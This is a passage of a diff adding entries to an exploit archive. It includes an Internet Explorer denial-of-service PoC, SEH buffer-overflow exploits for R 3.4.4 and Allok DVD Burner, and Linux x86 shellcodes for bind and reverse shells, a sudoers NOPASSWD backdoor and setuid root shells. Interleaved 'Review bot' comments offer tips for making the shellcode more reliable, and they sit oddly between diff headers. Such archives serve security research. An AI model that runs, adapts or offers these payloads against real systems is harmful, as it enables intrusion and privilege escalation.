users MSIE browser. 
+ +Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same :) + +Tested Windows 10 + +Stack Dump: +========== +(2e8c.27e4): Access violation - code c0000005 (first/second chance not available) +ntdll!NtWaitForMultipleObjects+0x14: +00007ffa`be5f0e14 c3 ret +0:015> r +rax=000000000000005b rbx=0000000000000003 rcx=0000000000000003 +rdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003 +rip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000 + r8=0000000000000000 r9=0000000000000000 r10=0000000000000000 +r11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8 +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei pl zr na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 +ntdll!NtWaitForMultipleObjects+0x14: +00007ffa`be5f0e14 c3 ret + +CONTEXT: (.ecxr) +rax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000 +rdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000 +rip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600 + r8=0000000000000000 r9=0000000000008000 r10=00007ffabb499398 +r11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060 +r14=0000000000000002 r15=0000000000000001 +iopl=0 nv up ei pl zr na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +KERNELBASE!StrCmpICW+0x6: +00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] ds:00000000`00000000=???? 
+Resetting default scope + +FAULTING_IP: +KERNELBASE!StrCmpICW+6 +00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] + +EXCEPTION_RECORD: (.exr -1) +ExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006) + ExceptionCode: c0000005 (Access violation) + ExceptionFlags: 00000000 +NumberParameters: 2 + Parameter[0]: 0000000000000000 + Parameter[1]: 0000000000000000 +Attempt to read from address 0000000000000000 + +DEFAULT_BUCKET_ID: NULL_POINTER_READ +PROCESS_NAME: iexplore.exe + + + +POC video URL: +============== +https://vimeo.com/265691256/ + + + +Exploit/POC: +============ +1) Run below python script to create "IE-Win10-Crasha.html" +2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10 +''' + +payload=('
\n'+ +'
MSIE v11.371.16299 Denial Of Service by hyp3rlinx
\n'+ +'crashy ware shee\n'+ +'
\n'+ +'Tested successfully on Windows 10\n'+ +'
') + +file=open("IE-Win10-Crasha.html","w") +file.write(payload) +file.close() + +print 'MS InternetExplorer (Win 10) ' +print 'Denial Of Service File Created.' +print 'hyp3rlinx' + + +''' +Network Access: +=============== +Remote + + + +Severity: +========= +Medium + + + +Disclosure Timeline: +============================= +Vendor Notification: April 18, 2018 +vendor closes thread : April 19, 2018 +April 20, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx +''' \ No newline at end of file diff --git a/exploits/windows/local/44516.py b/exploits/windows/local/44516.py new file mode 100755 index 000000000..7c6126964 --- /dev/null +++ b/exploits/windows/local/44516.py 
@@ -0,0 +1,83 @@ +#!/usr/bin/python + +# +# Exploit Author: bzyo +# CVE: CVE-2018-9060 +# Twitter: @bzyo_ +# Exploit Title: R 3.4.4 - Local Buffer Overflow +# Date: 03-27-2018 +# Vulnerable Software: R 3.4.4 +# Vendor Homepage: https://www.r-project.org/ +# Version: 3.4.4 +# Software Link: https://cloud.r-project.org/bin/windows/ +# Tested On: Windows 7 x86 +# +# Timeline: +# 03-27-18: Emailed author, no response +# 04-03-18: Emailed author, no response +# 04-10-18: Emailed author, no response +# 04-23-18: New version released; Submitted public disclosure +# +# lots of bad chars, use alpha_mixed +# badchars \x00\x0a\x0d\x0e and \x80 through \xbf +# +# +# PoC: +# 1. generate r344.txt, copy contents to clipboard +# 2. open app, select Edit, select 'GUI preferences' +# 3. paste r344.txt contents into 'Language for menus and messages' +# 4. select OK +# 5. pop calc +# + + +filename="r344.txt" + +junk = "A"*900 + +#jump 6 +nseh = "\xeb\x06\xcc\xcc" + +#0x643c17af : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [Riconv.dll] +seh = "\xaf\x17\x3c\x64" + +#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c +#Payload size: 448 bytes +calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b" +"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70" +"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62" +"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f" +"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69" +"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42" +"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c" +"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61" 
+"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57" +"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b" +"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64" +"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53" +"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61" +"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b" +"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e" +"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74" +"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b" +"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b" +"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73" +"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f" +"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31" +"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45" +"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50" +"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a" +"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53" +"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41") + +fill = "D"*8000 + +buffer = junk + nseh + seh + calc + fill + +textfile = open(filename , 'w') +textfile.write(buffer) +textfile.close() \ No newline at end of file diff --git a/exploits/windows/local/44518.py b/exploits/windows/local/44518.py new file mode 100755 index 000000000..635c6c26e --- /dev/null +++ b/exploits/windows/local/44518.py 
@@ -0,0 +1,55 @@ +####################################################### +# Exploit Title: Buffer Overflow(SEH) on Allok Video to DVD Burner2.6.1217 +# Date: 23.04.2018 +# Exploit Author:T3jv1l +# Vendor Homepage:http://www.alloksoft.com/ +# Software: www.alloksoft.com/allok_dvdburner.exe +# Category:Local +# Contact:https://twitter.com/T3jv1l +# Version: Allok Video to DVD Burner 2.6.1217 +# Tested on: Windows 7 SP1 x86 +# Hello subinacls ! +# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ +############################################################# + +print""" +#1. Download and install the setup file +#2. Run this exploit code via python 2.7 +#3. A file "Evil.txt" will be created +#4. Copy the contents of the file (Evil.txt)and paste in the License Name field +#5. Click Register and BOMM !!!! """ + +import struct + +file = open("Evil.txt","wb") +buffer = 4000 +junk = "A" * 780 +nseh = "\x90\x90\xeb\x10" +seh = struct.pack(": + 8048060: 6a 66 push 0x66 + 8048062: 58 pop eax + 8048063: 31 db xor ebx,ebx + 8048065: 53 push ebx + 8048066: 43 inc ebx + 8048067: 53 push ebx + 8048068: 6a 02 push 0x2 + 804806a: 89 e1 mov ecx,esp + 804806c: 99 cdq + 804806d: cd 80 int 0x80 + 804806f: 96 xchg esi,eax + 8048070: 52 push edx + 8048071: 66 68 05 39 pushw 0x3905 + 8048075: 43 inc ebx + 8048076: 66 53 push bx + 8048078: 89 e1 mov ecx,esp + 804807a: 6a 10 push 0x10 + 804807c: 51 push ecx + 804807d: 56 push esi + 804807e: 89 e1 mov ecx,esp + 8048080: 6a 66 push 0x66 + 8048082: 58 pop eax + 8048083: cd 80 int 0x80 + 8048085: 53 push ebx + 8048086: 6a 04 push 0x4 + 8048088: 5b pop ebx + 8048089: 56 push esi + 804808a: 89 e1 mov ecx,esp + 804808c: 6a 66 push 0x66 + 804808e: 58 pop eax + 804808f: cd 80 int 0x80 + 8048091: 52 push edx + 8048092: 52 push edx + 8048093: 56 push esi + 8048094: 89 e1 mov ecx,esp + 8048096: 43 inc ebx + 8048097: 6a 66 push 0x66 + 8048099: 58 pop eax + 
804809a: cd 80 int 0x80 + 804809c: 93 xchg ebx,eax + 804809d: 6a 02 push 0x2 + 804809f: 59 pop ecx + +080480a0 : + 80480a0: 6a 3f push 0x3f + 80480a2: 58 pop eax + 80480a3: cd 80 int 0x80 + 80480a5: 49 dec ecx + 80480a6: 79 f8 jns 80480a0 + 80480a8: 31 c9 xor ecx,ecx + 80480aa: 51 push ecx + 80480ab: 6a 0b push 0xb + 80480ad: 58 pop eax + 80480ae: 68 2f 2f 73 68 push 0x68732f2f + 80480b3: 68 2f 62 69 6e push 0x6e69622f + 80480b8: 89 e3 mov ebx,esp + 80480ba: cd 80 int 0x80 + +**/ + +#include +#include +unsigned char code[] = \ +"\x6a\x66\x58\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\x99\xcd\x80\x96\x52\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x53\x6a\x04\x5b\x56\x89\xe1\x6a\x66\x58\xcd\x80\x52\x52\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\x93\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; +main() +{ +printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86/44507.c b/shellcodes/linux_x86/44507.c new file mode 100644 index 000000000..16d051952 --- /dev/null +++ b/shellcodes/linux_x86/44507.c 
@@ -0,0 +1,71 @@
+/*
+
+Title: Edit /etc/sudoers with NOPASSWD for ALL
+Date: 2018-04-19
+Author: absolomb
+Website: https://www.sploitspren.com
+SLAE-ID: 1208
+Purpose: edit /etc/sudoers with ALL ALL=(ALL) NOPASSWD: ALL
+Tested On: Ubuntu 14.04
+Arch: x86
+Size: 79 bytes
+
+Shellcode is register independent and null free.
+
+global _start
+
+section .text
+
+_start:
+
+ xor edx, edx ; clear edx
+ xor ecx, ecx ; clear ecx
+ push edx ; terminating NULL
+ push 0x7372656f ; "sreo"
+ push 0x6475732f ; "dus/"
+ push 0x6374652f ; "cte/"
+ mov ebx, esp ; point ebx to stack
+ inc ecx ; ecx to 1
+ mov ch, 0x4 ; ecx to 401 O_WRONLY | O_APPEND
+ push 0x5 ; open()
+ pop eax
+ int 0x80 ; execute open
+ xchg ebx, eax ; save fd in ebx
+
+ jmp short setup
+
+ ;write(fd, ALL ALL=(ALL) NOPASSWD: ALL\n, len);
+
+
+write:
+ pop ecx ; pop "ALL ALL=(ALL) NOPASSWD: ALL"
+ mov dl, 0x1c ; len 28
+ push 0x4 ; write()
+ pop eax
+ int 0x80 ; execute write
+
+ push 0x1 ; exit ()
+ pop eax
+ int 0x80
+
+setup:
+ call write
+ db "ALL ALL=(ALL) NOPASSWD: ALL" , 0xa
+
+*/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x31\xd2\x31\xc9\x52\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\x6a\x05\x58\xcd\x80\x93\xeb\x0d\x59\xb2\x1c\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80\xe8\xee\xff\xff\xff\x41\x4c\x4c\x20\x41\x4c\x4c\x3d\x28\x41\x4c\x4c\x29\x20\x4e\x4f\x50\x41\x53\x53\x57\x44\x3a\x20\x41\x4c\x4c\x0a";
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/44508.c
new file mode 100644
index 000000000..fc5a49c92
--- /dev/null
+++ b/shellcodes/linux_x86/44508.c
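Review bot: The open() result is never checked: when the shellcode runs without write access to /etc/sudoers, the negative errno returned in eax is moved into ebx by `xchg ebx, eax` and then used as the descriptor for write() and as the status for exit(), so a failure is a silent no-op whose only trace is the process exit code. That is a fair trade for 79 bytes, but the header should state it, e.g. `; requires root; open() failure is not detected - exit status is the fd on success, low byte of -errno on failure`. The appended rule also assumes the existing file ends with a newline; if it does not, the 28 bytes are glued onto the previous line and sudoers may fail to parse, which locks sudo out rather than opening it. Finally, the harness jumps into a writable data array, which only works when the binary is built with an executable data/stack segment (typically `gcc -z execstack`), and that belongs next to `Tested On`.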
@@ -0,0 +1,68 @@
+/**
+# Linux x86 Reverse TCP shellcode
+# 127.1.1.1/5555
+# Shellcode Author: Anurag Srivastava
+# Shellcode Length: 73
+# Student-ID: SLAE-1219
+# Note ~ http://www.theanuragsrivastava.in/2018/04/reverse-tcp-shellcode-x86-slae.html
+
+
+reverse: file format elf32-i386
+
+
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: 6a 66 push 0x66
+ 8048062: 58 pop eax
+ 8048063: 31 db xor ebx,ebx
+ 8048065: 53 push ebx
+ 8048066: 43 inc ebx
+ 8048067: 53 push ebx
+ 8048068: 6a 02 push 0x2
+ 804806a: 89 e1 mov ecx,esp
+ 804806c: 99 cdq
+ 804806d: cd 80 int 0x80
+ 804806f: 93 xchg ebx,eax
+ 8048070: 59 pop ecx
+
+08048071 :
+ 8048071: 6a 3f push 0x3f
+ 8048073: 58 pop eax
+ 8048074: cd 80 int 0x80
+ 8048076: 49 dec ecx
+ 8048077: 79 f8 jns 8048071
+ 8048079: 68 7f 01 01 01 push 0x101017f
+ 804807e: 66 68 15 b3 pushw 0xb315
+ 8048082: 66 6a 02 pushw 0x2
+ 8048085: 89 e1 mov ecx,esp
+ 8048087: 6a 10 push 0x10
+ 8048089: 51 push ecx
+ 804808a: 53 push ebx
+ 804808b: 89 e1 mov ecx,esp
+ 804808d: 6a 66 push 0x66
+ 804808f: 58 pop eax
+ 8048090: 6a 03 push 0x3
+ 8048092: 5b pop ebx
+ 8048093: cd 80 int 0x80
+ 8048095: 31 c9 xor ecx,ecx
+ 8048097: 51 push ecx
+ 8048098: 6a 0b push 0xb
+ 804809a: 58 pop eax
+ 804809b: 68 2f 2f 73 68 push 0x68732f2f
+ 80480a0: 68 2f 62 69 6e push 0x6e69622f
+ 80480a5: 89 e3 mov ebx,esp
+ 80480a7: cd 80 int 0x80
+
+**/
+
+#include
+#include
+unsigned char code[] = \
+"\x6a\x66\x58\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\x99\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x7f\x01\x01\x01\x66\x68\x15\xb3\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\x6a\x66\x58\x6a\x03\x5b\xcd\x80\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+main()
+{
+printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/44509.c
new file mode 100644
index 000000000..9e2235291
--- /dev/null
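Review bot: The null-free property holds only for the specific address and port hard-coded at `push 0x101017f` and `pushw 0xb315`: any IP octet of 0 (10.0.0.x, 192.168.0.x) or a port whose big-endian form contains a zero byte (80, 4096, anything below 256) reintroduces a NUL into the byte string, which is presumably why 127.1.1.1 was chosen over 127.0.0.1. The header should spell that out for whoever retargets it, e.g. `# IP at byte offsets 26-29, port at 32-33 of code[]; a 0x00 octet or port byte breaks the null-free guarantee`. Note also that the dup2() loop runs before connect() and connect()'s return is never tested, so on a refused or unreachable target the shellcode still execve()s /bin/sh with its stdio bound to an unconnected socket and simply hangs or exits with no indication to the operator.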
+++ b/shellcodes/linux_x86/44509.c
@@ -0,0 +1,47 @@
+/*
+
+Title: chmod 4755 /bin/dash
+Author: absolomb
+Website: https://www.sploitspren.com
+SLAE-ID: 1208
+Purpose: setuid bit on /bin/dash
+Tested On: Ubuntu 14.04
+Arch: x86
+Size: 33 bytes
+
+global _start
+
+section .text
+
+_start:
+
+ cdq ; edx to 0
+ push edx ; terminating NULL
+ push 0x68736164 ; 'hsad'
+ push 0x2f6e6962 ; '/nib'
+ push 0x2f2f2f2f ; '////'
+ mov ebx, esp ; point ebx to stack
+ mov cx, 0x9ed ; 4755
+ push 0xf ; chmod()
+ pop eax
+ int 0x80 ; execute chmod()
+ push 0x1 ; exit()
+ pop eax
+ int 0x80 ; execute exit()
+*/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x99\x52\x68\x64\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x66\xb9\xed\x09\x6a\x0f\x58\xcd\x80\x6a\x01\x58\xcd\x80";
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/44510.c
new file mode 100644
index 000000000..5ea5f3df4
--- /dev/null
+++ b/shellcodes/linux_x86/44510.c
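Review bot: `cdq ; edx to 0` is the very first instruction, so it only zeroes edx when eax happens to be non-negative on entry: cdq sign-extends eax, and if eax holds a negative value (a failed syscall's -errno, for instance) edx becomes 0xffffffff, `push edx ; terminating NULL` pushes ff ff ff ff, and the path handed to chmod() is `////bin/dash` followed by whatever lies further up the stack. It works in the harness because eax still holds printf()'s positive return value, but the shellcode is not context-independent as written. Moving `push 0xf` / `pop eax` ahead of `cdq`, the order 44510.c in this same patch uses, fixes it at zero size cost since eax has to be loaded with the syscall number anyway and nothing in between touches it. The `mov cx, 0x9ed` leaving the upper half of ecx untouched is harmless by comparison, as the kernel masks the chmod mode to 07777.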
@@ -0,0 +1,60 @@
+/*
+
+Title: Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh
+Author: absolomb
+Website: https://www.sploitspren.com
+SLAE-ID: 1208
+Purpose: cp shell into /tmp and setuid
+Tested On: Ubuntu 14.04
+Arch: x86
+Size: 74 bytes
+
+Shellcode is register independent and null free.
+
+global _start
+
+section .text
+_start:
+
+ push 0xb ; execve()
+ pop eax ;
+ cdq ; set edx to 0
+ push edx ; NULL
+ push word 0x632d ; "c-"
+ mov edi,esp ; point edi to stack
+ push edx ; NULL
+ push 0x68732f2f ; "hs//"
+ push 0x6e69622f ; "/bin"
+ mov ebx,esp ; point ebx to stack
+ push edx ; NULL
+
+ jmp short cmd
+
+execute:
+
+ push edi ; "c-"
+ push ebx ; "/bin/sh"
+ mov ecx,esp ; point to stack
+ int 0x80 ; execute execve
+
+
+cmd:
+ call execute
+ db "cp /bin/sh /tmp/sh; chmod +s /tmp/sh"
+*/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\xeb\x06\x57\x53\x89\xe1\xcd\x80\xe8\xf5\xff\xff\xff\x63\x70\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2f\x74\x6d\x70\x2f\x73\x68\x3b\x20\x63\x68\x6d\x6f\x64\x20\x2b\x73\x20\x2f\x74\x6d\x70\x2f\x73\x68";
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/44517.c
new file mode 100644
index 000000000..7e5070c69
--- /dev/null
+++ b/shellcodes/linux_x86/44517.c
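Review bot: The command at `db "cp /bin/sh /tmp/sh; chmod +s /tmp/sh"` has no terminator and the byte string likewise ends at `\x73\x68`; execve() reads argv[2] up to the first NUL, so the harness only works because the C array carries an implicit trailing zero. Injected anywhere else, `/bin//sh -c` receives the command plus whatever bytes follow it in memory, turning `/tmp/sh` into `/tmp/sh<garbage>` or a syntax error. A literal zero would break the null-free claim, so write it at run time inside `execute`: `pop esi` / `mov byte [esi+0x24], dl` / `push esi` ahead of the existing `push edi` (edx is already zero from `cdq`, 0x24 is the 36-byte string length), then reassemble so the `jmp short cmd` and `call execute` displacements and `Size` are updated. The header should also note that the setuid copy is only useful where /tmp is not mounted nosuid and only root-equivalent when the shellcode itself runs as root.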
@@ -0,0 +1,54 @@
+/*
+; Title : Execve /bin/sh Shellcode encoded with ROT-13 + RShift-2 + XOR
+; Date : April, 2018
+; Author : Nuno Freitas
+; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-shellcode-encoder/
+; Twitter : @nunof11
+; SLAE ID : SLAE-1112
+; Size : 44 bytes
+; Tested on : i686 GNU/Linux
+
+NASM:
+
+section .text
+
+global _start
+
+_start:
+ jmp short call_decoder
+
+decoder:
+ pop esi ; pop the Shellcode address from the Stack
+ xor ecx, ecx
+ mov cl, shellcodelen ; Set the loop counter to shellcodelen
+
+decode:
+ rol byte [esi], 0x2 ; Left Shift 2
+ xor byte [esi], cl ; XOR the byte with the ecx (counter)
+ sub byte [esi], 13 ; Undo ROT13
+
+ inc esi ; increment the offset (iterate over the bytes)
+ loop decode ; loop while zero flag not set
+
+ jmp short Shellcode
+
+call_decoder:
+ call decoder ; Shellcode address will be pushed into the Stack
+ Shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23
+ shellcodelen equ $-Shellcode
+
+*/
+
+#include
+#include
+
+unsigned char shellcode[] = \
+"\xeb\x12\x5e\x31\xc9\xb1\x13\xc0\x06\x02\x30\x0e\x80\x2e\x0d\x46\xe2\xf5\xeb\x05\xe8\xe9\xff\xff\xff\x4b\xf7\x13\x59\xcc\x8c\x63\x5e\x9f\x8d\x99\x9f\x1f\xa4\x3b\x6e\xc6\x36\x23";
+
+void main()
+{
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+
+ int (*ret)() = (int(*)())shellcode;
+ ret();
+}
\ No newline at end of file
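Review bot: The comment on `loop decode ; loop while zero flag not set` is wrong: `loop` decrements ecx and branches while ecx is non-zero and never consults ZF, so it should read `loop decode ; dec ecx, jump while ecx != 0 (loop ignores ZF)`. The decoder also rewrites the payload in place (`rol byte [esi]`, `xor byte [esi], cl`, `sub byte [esi], 13`), which requires the bytes to sit in memory that is both writable and executable; the harness only provides that when built with `-z execstack` or equivalent, and the shellcode will fault if dropped into a read-only text mapping, which the `Tested on` line should make explicit. A naming nit: the title lists the encoding as ROT-13 + RShift-2 + XOR, but the decoder undoes rotate-left, XOR with the counter, then subtract 13, so the encoder order is add 13, XOR with the down-counting index, rotate right by 2; stating that next to `decode:` would spare readers from reconstructing it.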